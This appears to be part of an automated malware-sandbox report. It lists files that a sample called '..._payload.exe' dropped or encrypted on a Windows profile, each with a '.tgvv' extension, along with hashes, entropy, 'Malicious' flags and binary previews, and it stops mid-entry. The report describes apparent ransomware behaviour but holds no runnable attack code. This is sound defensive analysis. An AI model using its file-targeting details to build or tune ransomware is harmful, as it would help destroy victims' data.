                                                                                                      Preview:<RuleT.L...M;M<....I.y.r.R...|~....n.O.A]Z..M.\..R..thx!..#..g.........E.L.L....AS............]N,.T.^].1D+A#.{..6p.L.P.....u~.Z..Z+4'Yd."..l.. ..pcr2.4G`(.d..2\..<.._.b..r.y.."...l..;;..>z.@.th...m....sZ...8.>.~.P..s......3..m..o.._...-...+..._r..'Zf.{..d.8.......P.S.5R.a..,....k{_.|..KL.LI_...|..V.El..w...6.9E....#......w|"..#.*...S.b..?..../X.<....?N....K......`B..........r..5{........*..9re...).....\..2..5..*...r9C.8}wLG......r.op.A..F.Q!,O\....LC...A."..I.~.......D%.{.......&t....X..:.D+6.7....I..}.....+.=. ..q..r.a..>.8.-t.Y....J.'.....9<...hd...X&....n..{`....U..M>'4q...)g..N3]T.". ....x..|U.l3...)..2.$..D....Q#+.s.......L......X...i.x.!.\...o...;\.g1y./.[`....?...R..@.8V4.<;.l.`K .e.x.5.2,.v...Y..\..r'~).m.......u......S14...../}Ykp..la.$.,.2t..............e..'.3.]..F.Dh....D.XWk..S..Qj...9K..)...X.vj..F..d..|].M...%....5.0G-'...B.4...Ti...Y.O|.J...j..8.xL.U ........5Nd......DK....].S5.w.|.S...%.X..`-.|...........'...Z.9....d37X...f..|.JW.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):361051
                                                                                                      Entropy (8bit):6.5143154354738675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:rxnkF2X8WwCKdCdRspsSoOEWV2+pR+am32AuLwUwz+oVhAlsZLS4Zq4:raFbPCdapjpRlUamG/806ysY4
                                                                                                      MD5:951CA16A73D53B0153FEAA4EDD14C46A
                                                                                                      SHA1:CB6393D6DF1A1F0727265FE907BA2A32CA16E90C
                                                                                                      SHA-256:B07B8B59E7B4633EF3E3A6483ECA75D979A8BC54075FAF842CEC894B235DB25A
                                                                                                      SHA-512:9559FBA1A10B69FC90EC8C0BAEB7C7D89E2992E2754E7D1DE1086FE9CB2CA18AE4D9C53A2BA79E34377A0836056C8F562C359163288F3A94545453E1CCAEBB67
                                                                                                      Malicious:false
                                                                                                      Preview:<Rule..lu...Q...yK{....pf:..-1c9..........bp....V.;...e*X.K.0...9......;Y....-7..H..F.|Gr.r....k..xX.)........L.?...\.bL...........`,.....|..i#..&..E]*.#.U...P8..XX.....U...C8..m*.Z..=......B..D<..1....h.*..,{..3...e.$....L........;..........~V.#./@.2..l...A..wB....U...xa..k.8.T.S_._..i!<vn..1.<..0...,..}....df..Z{.S..65..i.96C4>;....D.F\..o...K@.Z.|.....+......l5..N.....N;I...)."AF.m.N....%.!N...F..2....g..c..q.TU.=,\.....d.!.....qQwIh......."..Nh.+.H*..._c"..T...W...P..'...!n:./..Y.uJ...Fn...IZ.h.........M.p.9u.E#p.....\B~.p`.->...xJ.......E...w..y> .O9.~...-..y.-.i..kRv<..bz......s...j.*.}.........w.;~.;..d/nW.!....\...M.O...X.%......*.....c....t.*...JL.....47.f,Y...._.........5...C..$.qq.J.n".].W.*3...........Q..l.G.c.f3......oNZ...\.fj......F.8..7..f.8,.8H......t.?Sr.y.L.@Z=.F.....B...-...\.Y......!{.....~.[...W....nO.nA......N....{..l....Z...~..M..;..h72_...Q.....Z_I.G...me...E...5L Z..Q...-..%.k.<(.K~p......6^....Y]0.......AIR..

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\officesetup.exe_Rules.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):361051
                                                                                                      Entropy (8bit):6.51412978449559
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:+0lpOi5IJw/mdqvwxR/1oyR87W+KeKrMUIEi3wNmswjSusSChcF9Ucp:+0lpOiaKLYLkKmCDIEiANlsSbSwcocp
                                                                                                      MD5:780DA3883561A585E23773A8C48E11AB
                                                                                                      SHA1:F1E710FF87E9DA5B588C3CABAC06FF6DB3A941B6
                                                                                                      SHA-256:11BA73E614993156F45355699BCA32ADB51B3487F061D4AD0A36284797CCAA3B
                                                                                                      SHA-512:E1FB83645C0F8379655E51FFC8D5D3E5F38042BF5EB07EFB1B3F3AB44FB8922C0114B283D6D4208636204D7169549B1E9201E56A70029E4D7E64DAB002BDA63C
                                                                                                      Malicious:false
                                                                                                      Preview:<RuleW..l.K.'*.s4bG....Y.v;Q../8._`(..:...b_`y..4...G....[;..g87X....a....f.!.U..x.....? .%.9..F.....wa....!..8...T..u...B..6r...;[.o..iQ...U..%q.;..G.,DL..~...._....N{..2.0o_......'...n.f......9.B."<...b.....a. .\..2.h..SY.....".x_.F.6...1........r.I..0...C...%..y5i..s.F....W...y....@...H.x...4..6..7NBI.Rl.yj),.)...W.b..W..\u.|.~..\....B9.?..6..:...x...&. 3...........f.H.q3f..l.R.....i..J...<Z.......xVd...$zs:.m........b(.b1*^.Pe....:....2..nN.d...99_._.nB4..*...8`JE...4......Z..r......B.h.[Y.e.....Nw..X..S.....&%>.[..y.......:........h....ou.(...R.J... .R.2.b...d....&?.q<.>Lv....N."..1.x.(JJ,.b\..%..}>.9..IpVp..G....YGQ.8z..L..@l.).l.q=0.-9)rS%.y$..+M....._..[\f.R..U....V.d.9...V.Zac.33.E...u..zc...A..B........_"....k.zC.H.T..=....w.ly.z.....so!...J.Yc..'j..l..=][_....d."....Y..Xyrzt.$.%E...UXv}........\.~........F1]f.....*@.....3.. ~.}]...R.X..<9MQ..8#..WK..j\92.I..x.].k..m...I<y...6z<....K`.."..oS.q.-q.1..T=.e....\..!n.&9..`...3~

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):135031
                                                                                                      Entropy (8bit):7.998563706080457
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:jmLfRNDKGhJufv3IU6xCBBYU53wHId6a6w/4Mv31A7wh3NMm08ukA:Cd5pJOyCsEgH19Xwh9708PA
                                                                                                      MD5:0D13E2EF4A0F208A91E4FD731633C6A6
                                                                                                      SHA1:25C9C487C91215EA63CF1B740459E1B70DAEB881
                                                                                                      SHA-256:73EF6B4B951FB45BB53671785F5D69330C2B8928EBA4CF862CD7857A2F611EBB
                                                                                                      SHA-512:4FD26CF3434861B1CCAB09F50EC1AA69F1CD18769F888A7C23AB35A2C16A02A6F0DE7702075713EF0B6DCE419B51BC6606CBD19C0BF6C45B810F9BF3A184E50C
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml.?NO...K....w.sQ.&-p......c.g.q......l.&...GKJu.2.f.\Si7.3.qKp..w.l;...0f...~l.T.U.oU...[M@.w....K....Zg.."].k.|...I..}..JQjV.....2.B&.+|...6..... d..E@.d....]Mc.&...C6...U..W.....K..'...#..'-..5.S..5'...[.....!....R.I..%....)...s5sO.%x.x..W.......%..C...*JPL**..H......lq~{.7...L.wt.}p!J.N.....6....P..x...~V.q...x...})Hrs.......Z<........ey..h..]b..N.$;.z....U;G8W..U....&3.R....-X....v)..Z...Xx...}z..!....S..f....Oi....W..]............u(NS#.bG.D..M...*....b^.^...eU..Hr...n...d6.e.\#.n..9..%-...},......1.{K{I......Z%.T..2.v.(...5.H...'..Eq...xf~..;.k..mT.....#qR.T...F..d].E%......Lg?...W........{...'.E.V...0....P..Gs.t.C*....%...R@..L.../..&U.......LCz.r.....MI.0J!jy.LYC.@t......{......[i..x+...e.d<e..~.<.K.$?o.c*J~P.Vdy)....S.~..N.....C.Q.I.........`o8y.`....e.....N...a....Q...fs.A..PRL.O.>..L...UO..K..X`.....t\...1.'U.Q..S5....v....z...R ....e...u.Aj.!...;z....8.r~.....:I.>..,.....Q.&..6.].;........E.|...YO....m........p.g.;.....)a

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\Features\1-3FeatureCache.txt.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1152
                                                                                                      Entropy (8bit):7.8111722245269455
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:K5KLA88kgAtdI+0AYjAnMgoXT9ae7bKUEXKDLKY1v6bD:K5K3mVjMnSZTbKUZDLKY1wD
                                                                                                      MD5:77E7C0F041E3D0609953D9E6587154D4
                                                                                                      SHA1:CAE454A75AB7135B8685E86BDE79BD8AE2598A3D
                                                                                                      SHA-256:AF6B27C5A12CDD5F288447B59EA61A350B3BD69EF6568DB26CF7EC7C0C686E0B
                                                                                                      SHA-512:655D1344395173F98A810C5F38EAB2DEF3DF0D3E2490865A3B8F8A2E26CE17815A4549B5797929DE6763B05F40075CC6D1CD915CF9D99B98DC9AB080B77C1867
                                                                                                      Malicious:false
                                                                                                      Preview:1.1.9..t.=}a.j)....r..*%.......$.1.U. ^..D....I...~.....P!........Mm.k.5...J..#......e!q(4T..%.3.v...wx.,...E...GG..x/....t.{=....Lj.....a..cS..O<....zH.^..D..".:...}.....}.4.u.9..i....&.o...h....u..:$.qs...s..R.......u..?.,..s".>t..l....%n.)w..?~Z_.l...}.i9..#...:W.vw..............`D.. .......1..E.>..y..[..$y$...h.J)..,.v....M.P...=T.Ej7+..L0."S..T...5a.|x......i......V.OI.....9.C..Dq.PM.a..Y3+...].....'a.Xd...g..7@..'..(>..n\R....!.9.X.lR..+....c.*..0yS...Y_D.1#zH.(.`.h...l....+/k:D.......[..O^..Mu.C...C.zC2<..M.L.*..=.-........!.`Q..#..<kH..V.@..FK..m."..c.PN;I...:..3.........D.PCL....-B@.....E..O.o....~....:.ve`ig.......'.`.It....r..Qvyr...\.F+0..5.%..7+....=.L.M...#4....w.(lZ....^T..]........j..z../....+t....sA$.Z.(..Y.&EE.9.+.g..):=.....<..v....4......Z...........zq.q....RX#.0g.6..C3.....7.Au.t7...u.e...e.....>i=Q....Mj.....P.....;..)........t......'.y(J..s..'..[a...D.`/..k+.....qn.....,.[...c.F.........4....P.UGg.Y....

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\Features\1-7FeatureCache.txt.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1170
                                                                                                      Entropy (8bit):7.827260529975816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PdOf9RfV5clek0e2/VXDWaAq14Bu6eWAIERktdUulNtgv6bD:PdOffvB4q9DWalO/AIEOtdUwgwD
                                                                                                      MD5:92AAF89BA514B25BC549B7EF8E7C3F68
                                                                                                      SHA1:068A04D5D58753E00F641195A902EADC4533D7B9
                                                                                                      SHA-256:8C5C30584F6046CBF766DE33DA4824F72154A3540B4F9F3CFDC2EF5AE9D3C887
                                                                                                      SHA-512:6386EAB808E43C4C0F16E39DF8B5636DC434AF85D04694200D3C52AE00ADB12A92C257BB7F561443646F3AA96684CA5C22E74613BADD3306E54C3781E9EE8CB3
                                                                                                      Malicious:false
                                                                                                      Preview:1.1.9.......\.qG.....(zH..,]........7......R.".-...H.l.g......k|Q.H....r...*%.v...5.X.........yT...'?.~.2.....~..)>.'........7....|".%7..../.M...........3.;Sny...s.H.G....ZX....q.t.a.~.uWm..Bpn.[?.f...4...p.....)..b..1*9.Y.."....L7.+.?.n....Vx.?..r.|..<...t......0S..P.]+.@+.1........a.sA...;V)...........'z...P.gdN....B...b&..N....w.B.~[..-.......j.P....p...2...%.....U.......8...o...V....A.=.K?..r.*.....#.j..K.{Z...2AK....=;....*o.*..JKI_.@..+.d..M.d..G...v..U.,./......JTW........./..z.....Foko...k1L{.......j.h...D@..a.....ud.=]......g6y.[.f.......C]....w..?.$...).eV-!.k.L....2..t*...^..,.-.....h.5..|,.,.CQ..y.R....}..e.BW. ..K..I.Q.(=...0..4...w._N.%g.7.......d..K.[z...mo4...T.q........m'.'.....r.?5....U......$.Z..*...w.&.G..........Z[<....d.....@. .b.i_-...m..K..A.X$...<h..(I.v.....7C....x".wH..7.......R.@../..`@3../...ib.e..@...O.wk.?s.t......,...T..L.....&..a.XGl..q...j.&- ...x...x,Y.f!..\a,Tk.m.T....W..e.k..R}..V..uZ...u....L..L...c.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.session.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20814
                                                                                                      Entropy (8bit):7.990725211372473
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:Tws50CMY5bonfeb3CMB4UwpmC03HfoEPArG1AuboNnQIj3:TwOHMY567MgE3voEPWG+HKIj3
                                                                                                      MD5:395BBB347EA10307D5A2FC8102623363
                                                                                                      SHA1:2B9A3E8879F5340573EF40F520B1EBBE097D7793
                                                                                                      SHA-256:73DA18276AC8A544980E093BCA8F908D43ACC859817FABD851C2D88D13AC48D6
                                                                                                      SHA-512:298E60865EC18CF58484C8937A9154923C88FF8180793374FB05215B510CBB790DA82EB1D49F8FE2B2AD6BFB9D3FDED7DFE871AF5EAFB78BFB32F75754756D7A
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit...?.$...?.......U&j.f..p..T.66.Q......3....8.X.W...js+.r,c.3/..5..5..$.N......k-p.v.......A.....}P.<..I.O....,+O...*..+._.d)P.w..3...Z,......Sz.p#...=M[.6g_...K...F..B...Obdb.zgY...d.....|6.t..B..q....\...h../..W.?f.7[_u!...i,.B.;X....9.p....21....4..N.&.....e)]....s...@....(N......0.....R..T.s..I.m/...$.Z...@g~ p.X..1..o...o...R./.......=.I.=.}.T...J..D<.3.D#...U.Z.....?<......2..g....>W4..3z....+.U.,...W.Y\..O.CF.u&T]..D.65.....<.......4r.SWUb.^OgD.QS........th....N.gbQ....f7.:..,...>..V.W-g.b.L...Z...N...G.5.....h&.z..-.S5}......"....l...R....c..s..jZ.KB.....j.....5........`....]..L0GU.O..X........N.CJ.`...+i...].6.-n..N..;.!8.O ...z.{. B4...t.OjE...n....^u...DbJ.o...'.n ?&.i3B.>4=..H&.5..../..S.mU.C......'(2.B.w..V$&..s|.2..f...q....(..L..W..kDN....(.BW.".#....#a3.G.ly.I.r..8..I...U...S..8.L0.....K....z.M..}z*......6..v....I+.me=..........$q/.....K.f.....{....[.YZ....Y`v&sm.:.1...*bc.D.-..(_`/a....d.`0...yga]6.zU.....;.1UI.h.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37198
                                                                                                      Entropy (8bit):7.9945719173170655
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:uRU8S/VRV3mTuM0dvAvcnqWSKYWHhvbpztQWeKX6SFvGGLKhw2:AUn/VX3mwAYq5qzpqWeKXLKq2
                                                                                                      MD5:F5725743D23AEC75D7CA052917E8F454
                                                                                                      SHA1:13E19C869E53AADC80BAD0777D82EA1940A67BBA
                                                                                                      SHA-256:350F0E736D61915104E2D248C43D42F93CEAF4202160F77A46E00D26E57901EC
                                                                                                      SHA-512:C8A0C394BDB0766F8A2A0A08362EF7AAECC92DE0DBA9C69F08508E8472764B07B832CD43ED0B4B4E1A6D22D6CF31DB266FB2456A0A7A7D200FB653637D6845E1
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit..\.>..m.~o.........V..]C....863Y..vf.\.t!...>...tOay.....{.\....e...1.H.Um..M..b.L..._.B.m.IE.h.Q'.r...z...).3..9...4b!Xd*.6C......"..>[....{!r/..[...^.I=...h...?...+.$..........VH...o/@.....G.....g{).^.iq\.B.x..9....?.B[..EPQ..yD..Q..pm...S.uIu.3...:#}..rb....}...yE k..D."h.Nz.Xs....O.dqc.2n..@.,.L...I..4.5..}.....nPG.....^.m....k0..7..<..SI.....o...7kxpN..^#.l\.P6X...o B..2.).....O..u..iU..G..2d..Q7...*b.&.u.$...^n ..(.\0..I..p..M..W...o..=...J..Ch.s..8....,.Vn..q..;.....0O.....t...H,..-n...`...@...wc....42.+..!)3eg...F....V.......zW.ev..JP..j.%..<.....@=..7."1Zaw.Tk.:u..Z9.m..`Ji.....M1.....Mj...|..@..-....pAF7jb@Y..N.>`.B...o......r..4..$ ........... .q1.IF..u..!V.......g.W.7.n*/..[T..W...o.............P....X.:..~..m/.?...@.W...lkK.A$#Z..w.{..T.U@.,.@MEM..|.*b...]......f.....X....T&.F,..z+z.zF8.(<C....^$..j.S.!..!......crz....*#?v............-1YB#.Xz...."1..zA [.{n.V..A.......`..+h+Lp0&;N..;...d.1.._!C..(..b7. P.....*......

                                                                                                      C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1353
                                                                                                      Entropy (8bit):7.827961579691975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YNHO0xzSotLH/sMNwBPomAlqnsPXAs9WIsCmVMS6UTdIQdmPYHm911v6bD:YRTz1/fNrpPXAUWTVMSxOQoPYHmhwD
                                                                                                      MD5:B11344C108BB4671B9D0FDFE63DF7AFF
                                                                                                      SHA1:C9941D861DE1DAEF178CD48EA1AE460D158DC021
                                                                                                      SHA-256:D91C46EE67656E07BB04189E89654AF7D16B836FC9CF328CF8C4360D3E81F7B8
                                                                                                      SHA-512:527867C4D3122805D1CB54A7EDD1B56E78E003E1DA5C0A2353B2A6DF8B1B3B416ECD31EBAF34ABA8A85F40D2AFFD89B32710F4F9AF78A1AD7ABD2DBFB338E310
                                                                                                      Malicious:false
                                                                                                      Preview:{"Rec'.Q...9...T.</]..hw.U#.E......\..s.1"W......OeU......O...b.%....8.... ....._5.x....5.e....x#.4J.....31P.0C.vr}...t~..u..........6.......f.2...6076o...,....=nv..u.+.."..4`0.{..........m.L.B*t..U.3..S....rDq..u.....zV....`O".v..(....5.....-Ua....@g...Z..di...A.~Fx..8.....X.qJ#n.J6..../......^..>:e.^/......qH...........6...p<..6.R..28*...E.ya.D.X.C.~.i/.Z..{I....*.S..]...>p.....a._.L.A..j........4.@...O..<'..U....D....._.~.....!...yO...@..!..~j..y.....t....Q..G..y.ky<..AJs..?..*.....5..S..R.$e.@...,C.7F.&.I.&.....4f......d..vs....;I.m.....t.....k5...t....>..`:b+..<{tr.....g.}B...I....vOt...VG....rn0.......D...e.. vZ......._W..R.).a.).....w...+..'...D2.>q..2.*...Dcf.j..i.z..O...........:..0..N..W.u.4;.G...H.i..6'.....L.....W..?.;.^m......{J./|..i..-.{.."...]f...Z7.Hl.i......(y.........?..t"2...G~!..\.I4..+).{<..30...L.-......cv..`^......)e0.xQ.A.[P..$.S".#R......'....z-. .s.g...;....y.......>.J..i.o...>jy>>.....(.n^_........q@

                                                                                                      C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20346
                                                                                                      Entropy (8bit):7.9911319056355845
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:1juKD3BRsjmOiOf8PBj+LyIUb4ZVh5VA9uZy+uqYcJGgfInt8C2/FLWRCV:IwTI8uym5ZNAgfQt8tCRCV
                                                                                                      MD5:3CBFC06CEAA8710D197F0CB6DC44AB01
                                                                                                      SHA1:8E2CBB15D8DE6EC63DC0D5DA8E245A8052CF319F
                                                                                                      SHA-256:CEC224C40EBA9B748F9DD4DB76ECDF3823B27CA388A75F2AB8A64EB954B53072
                                                                                                      SHA-512:57129C0811BDE3FDE99AA8A677BFB7219978CF566B9FDBC63075F5338231039553F7550D773838ACBBE670F6DDA520D480992684FF44140DB1DCA55124EC17A1
                                                                                                      Malicious:true
                                                                                                      Preview:.......,.=q._...!.,......S......r.s.*.ru#...nd......Z....ga..|.)R.'l?.@.>>O.+.9...!n..........t|.....9y...XN.x..v-..n2K.X...'.t........F..._.2l.B.u...B..M...m.a:.....A:.. T....M.e.5I..@3}.k[.q.bs{>..O..l.L.:..-..../..qN..;....(qw.\V.{w....../m....#.t....h.g.;...\...}..#..>......+`'....K.T0fT3.M..*...|k.q.J.]r?.&...{_..5......IO.M5...Y...n.Y~W.&[(.g!.O...v<...[..*.g.;{.l..}..[.m.H.d..w.......P....K......P+.I......f...}..~.+..|.......Cx.z...^...g. ......$...?8.k.Y....6AG........pw......f.K..e...u...p,i3w............&..k.EJ...''....T....+...6.eY)..fH....)`D..>.qu....I.....z..3.....R.U..N.....G.......z....7p.n.3...E....q+G.Q...Y./9_*UF..ECI.P!R.'......o..Y..R..0....6..u.w.....;O....Y..|..[....H.o..C..!.a..R...s?...........v...."V3S.MK..b}..?.%..cj......E"....,..E......hf?..1.3.,..9.........NU....?..a*..jHX.g.&.....O.R..dwf>.i.nA....?ZG..kZ....V$.fi.:..(...d..TY...o.([.;./..;.6.B..@:..r...$...I..`G*..QBl..#..pJ..#.....|.H.I....1/....&$..U..j.

                                                                                                      C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24210
                                                                                                      Entropy (8bit):7.992856443083905
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:39hFwF/bTLeDCS98OOB1vXS9mOiXbwFDhxV3j6jz7h3VLKtRN+7VrkxuH:39TwFDTLrSkdipiyFWjz7h3VLKtH+Brr
                                                                                                      MD5:4A04D73D474978729815C52505C092BF
                                                                                                      SHA1:867660817F3F0630B01BE74B939CF609B2D046DA
                                                                                                      SHA-256:8F21130898760BD816356545F277166453B651085C8EFD865C768A4320A30314
                                                                                                      SHA-512:81F9E8AB0922AEB166DD1A6D945C137C67D69CF45054FCE84351BBF5ACB2D71DD40D60E8BB463EA297B2DB01B04E1FC9599DB9DEE08009EACBDFE23DE3F8770F
                                                                                                      Malicious:true
                                                                                                      Preview:03-10....5..0..u.Ya%..I;.........."..g.8j..(..........8.@..|..d.y...l...C..CB.....).)8@%R....+.Ti..3.b`.h...WI3.~..*%y.W.8(..}.:......./..?,.9..}.A.a?..G..'0.h....*+....zf...!l..(..]^.G~....9...Qi.....^.Bt..6=..x...y..vT........w.G.... .h...0p.~.....h.....ct..Q&........O...F.B.0jxr.H....e...,..........M.Oc....KW.\L.2.$m8Z....f..kN,..{...99iW........r..l.....M...ZC..T...-..+......\.........,..*...i%..j..$=Q..n.#.s.....).....YTC.L..:.....L.....i..I.......4.R .]....(..&........^.._00v^._....6...Z.c<...&.=..3d...L4.!P..~D.....h.*P..'6..G|.....$.B.al.w"p[`........B/._.v.y..=.6oQQM0..........7.v...O@..s(.T.<w....w.w....;.:...M........+.Y...tN1.^..!..j.iX...q.........7C.>E.X..........Y_...g.M...G.|...=.8M4........T.GM........6...e.nw-...[.g.C.J7%/'.....<XWl.e..`.YY..h7..+..C.QJ.....B<y,..X.r...........6K.~.$....ox..7..=.~r..................G/#.....m_.!......Ic.5.*.F.>..<.PS.I..?..K.aC...I.1.">E.6..@..7.S+......h.6......F?....I.$&..F..=q.......M.

                                                                                                      C:\Users\user\Local Settings\Temp\wctAB5F.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):74525
                                                                                                      Entropy (8bit):7.997429010374617
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:sb64rX1f/IAfj9wEiSVwykIdQaymnY0hsc9YL:shIAf59i8nRPk
                                                                                                      MD5:8C3BC2E6BAF858C6EFC25A58BAB02465
                                                                                                      SHA1:5FE00A623F2B631C5E4B8178BA50AB5024EC356F
                                                                                                      SHA-256:316A5806F064BF5026E7263609E82B5C35F23E12BC1F007C611CE4E01F5941C5
                                                                                                      SHA-512:CE8A5BF39F4F3434BBC1D1CBC1F4630441E5FEF81C14E68473E6DB95C439F8F3C679EA575DB10778E32898FD4DD29A46AFCB1D0B9A14B9422E3A04CC16198228
                                                                                                      Malicious:true
                                                                                                      Preview:{"ram .^..'q._...Jn.hY.y..vPdtr...a.x.V./t.m3\*....[UQe'Tu..X...B..w.I<*.....l`......-h.l4.....x.4..=fHm..vp^....9..3^J..^..|9..7oX.~4...>.r..Y.vl6....J..JV...Jn..a....2..GvuD...3..|6.G..p...z.D9............d.~.^.{W..>.<..meE.KB.Tr...Z..BQ..e.Yk..#.CO.l\.7..G&..CI..d....i......z..pX.f.z.3.@.v.mW..../.?.O...s... ....lN7.x,DdTJ2r.}..Z/AN..U....)...(...L$....O<..ev.../..$)3~P.|..s.4.&...5a....X.eM..9..$...$S..5.~.....".b...@pW.....&<!I.D!...ZO..tR#S..e..(.?...*....Ai..HF.........Z.v..#....L...E......(..9.T......i........%.t.D..Y&..]7.R$;l.B#.FS...C.j....._...M.vb.5kY.....}.2H..S......w$.x.y...R..3..E.....Q)ie..p.>k....kW&.....F.z........k.V......%_..a.R.,....u..d.mq...lk.$k..=w.m....3.......n..S.W..].`.0..l. .A.......&#.{..h............S...........].]_.<.=..g..cV...._}.N....! ......(..0ko.?W._G......~U.zQ..V.m,..g...8.l. ..ec.m:B..Nl}....]M..ca._=n..L... ."p..`|..V..*u3..V.5.;`....z1..bK..f.!.M.g...YQ.9.8.1..W.<...^Z..........!..j24..E..

                                                                                                      C:\Users\user\Local Settings\Temp\wctDB2E.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65188
                                                                                                      Entropy (8bit):7.9971193199728905
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:j27YHUuGdyx2AJZwhSbcA7gwL4i/hHIsrfFvoeO4F:j27Y0Ldy8BSeKh/hpJo74F
                                                                                                      MD5:0A1E72E18DBAF51F6A3DA986288D8296
                                                                                                      SHA1:BA2BC6D4A1842DB41AB62320210527015DB3EB6D
                                                                                                      SHA-256:A738F754291196BD169E7DE16C5C5F1F3BDFC54B3D7ECD6A103F25C7C1066BE2
                                                                                                      SHA-512:5D6BD79045A07E2572815FEA1E91A8517257D5D33C0667202311B1424786401CC9EE6DD0C5F250CF085615EC03F3A2746B38DBACC317D888353885BB71C8A144
                                                                                                      Malicious:true
                                                                                                      Preview:{"ram..I0..~S........|.......gG%?..%..#X...^..QV1....9...]...@..xh5B.)......7fx4a....[.......]...Fi..$:#A.....o.Vr.z.....Ddv..}.q.H*Up.|LQe.Nt..]XG.U....>..`6]F..6;.....>7...#.Xz..'.D.S....:..".F...,.DT...&..T.t.....a..>....WO.h...*.?.q./y./..Q.HcY.N.Kv..f...........Ut..r[.$..U..1.;.Z.4.(.K5q.)..u.v)=..#.I....Z:)..............#..B,.........M-.(Z).6X~.1..._~.W<|.,...Q..R.....zY.uX....`.y:Yj..o.Z..Z:..~..f.T..=f.....Dql..^LF..u.....L.....FGB...i.w...4..+;V.KD}...%..).....G..@......M....*.`.....<....,6....y.TU."...S....,...(...-.p...... .,M..GO&85:BB#].VO..JM.=f.".B....l.b..$.G.h..SI.).+.j.k....dH"Q.q..........y..KC.k..................>.Zsk..Db..v$p....U..g..1}.3g.;+K&.p.8T....Vc.w...O.|.=.3fG... ..ET.w:....C.UD..'>.. B..m...7..a..Y...cTj...u.b.........*-.!.b.......W*..l......m.....T.Pv.....({S.O.y=..q..}.....F.|.+..1....q........=..:...zu.T....L.V....@1.O.5hb.C/N..}.X."n>o.....K0@..![Q(...KW.Mo.....6gh.I+..S....9.|.yy.og...Q6@.`.\e.

                                                                                                      C:\Users\user\Local Settings\Temp\wctE4A4.tmp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
